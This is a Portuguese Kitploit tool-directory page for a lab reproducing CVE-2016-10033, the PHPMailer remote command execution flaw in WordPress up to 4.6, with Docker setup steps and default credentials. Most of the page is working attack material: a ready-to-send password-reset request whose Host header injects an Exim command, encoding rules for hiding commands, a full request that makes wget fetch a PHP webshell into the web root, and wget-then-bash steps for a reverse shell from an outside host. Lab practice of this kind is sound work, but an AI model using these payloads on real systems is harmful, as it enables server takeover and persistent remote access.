Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/liusec/wp-cve-2016-10033
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de PayloadsLabs e Prática
GitHubliusec/wp-cve-2016-10033

WP-CVE-2016-10033

Ver Repositório
1há 9 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

WordPress <= 4.6 - Vulnerabilidade de Execução de Comandos (PHPMailer) (CVE-2016-10033)

Informações da Vulnerabilidade

O WordPress é uma plataforma de blogs desenvolvida em PHP, que permite aos usuários criar seus próprios sites em servidores que suportam PHP e banco de dados MySQL. O WordPress também pode ser usado como um sistema de gerenciamento de conteúdo (CMS). O WordPress usa o componente PHPMailer para enviar e-mails aos usuários. O PHPMailer (versões < 5.2.18) possui uma vulnerabilidade de execução remota de comandos: um atacante só precisa construir engenhosamente um endereço de e-mail malicioso para gravar arquivos arbitrários, causando execução remota de comandos.

Versões Afetadas

WordPress <= 4.6

Informações da Imagem

TipoUsuárioSenha
Mysqlrootroot
/wp-admin/adminadmin123

Obtendo o Ambiente:

  1. Baixe a imagem para o local
root@kitploit:~
$ docker pull medicean/vulapps:w_wordpress_6
  1. Inicie o ambiente
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

O 8000 antes de -p 8000:80 representa a porta da máquina física e pode ser definido livremente.

Acesse http://127.0.0.1:8000 e veja a interface principal do WordPress, o que indica que o ambiente foi iniciado com sucesso.

POC

Supondo que o endereço de destino seja: http://127.0.0.1:8000/

  1. Copie o pacote HTTP abaixo para o BurpSuite Repeater, clique no botão Go e preencha o IP e a porta de destino (por exemplo, preencha o IP com 127.0.0.1 e a porta com 80)
root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. Acesse: http://127.0.0.1:8000/vuln

Se a resposta retornar o código de status 200, o arquivo /var/www/html/vuln foi criado com sucesso.

Você pode acessar esse endereço antes de enviar o pacote; ele retornará 404.

Exp

Ideia: crie um arquivo de texto em um servidor HTTP remoto e baixe-o para a máquina de destino usando wget.

Gravando um WebShell no Alvo (Fortemente Não Recomendado)

Se você já consegue executar comandos, para que enviar um WebShell?

  1. Execute o seguinte comando:
root@kitploit:~
/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php

Observação:

  1. A URL remota não deve conter http://
  2. Todas as letras devem estar em minúsculas
  3. Todas as / devem ser substituídas por ${substr{0}{1}{$spool_directory}}
  4. Todos os espaços devem ser substituídos por ${substr{10}{1}{$tod_log}}

O pacote é o seguinte (substitua o user_login conforme a situação real; o padrão é admin):

root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. Acesse http://127.0.0.1:8000/webshell.php

Shell Reverso (Recomendado)

Se o conteúdo do arquivo de texto remoto for um script bash, depois de baixá-lo para o destino, execute-o diretamente com /bin/bash.

  1. Baixe o script bash para o destino
root@kitploit:~
/usr/bin/wget --output-document /tmp/rce example.com/1.txt
  1. Execute
root@kitploit:~
/bin/bash /tmp/rce

Links Relacionados

  • WordPress Core 4.6 - Unauthenticated Remote Code Execution (RCE) PoC Exploit
Baixar ferramenta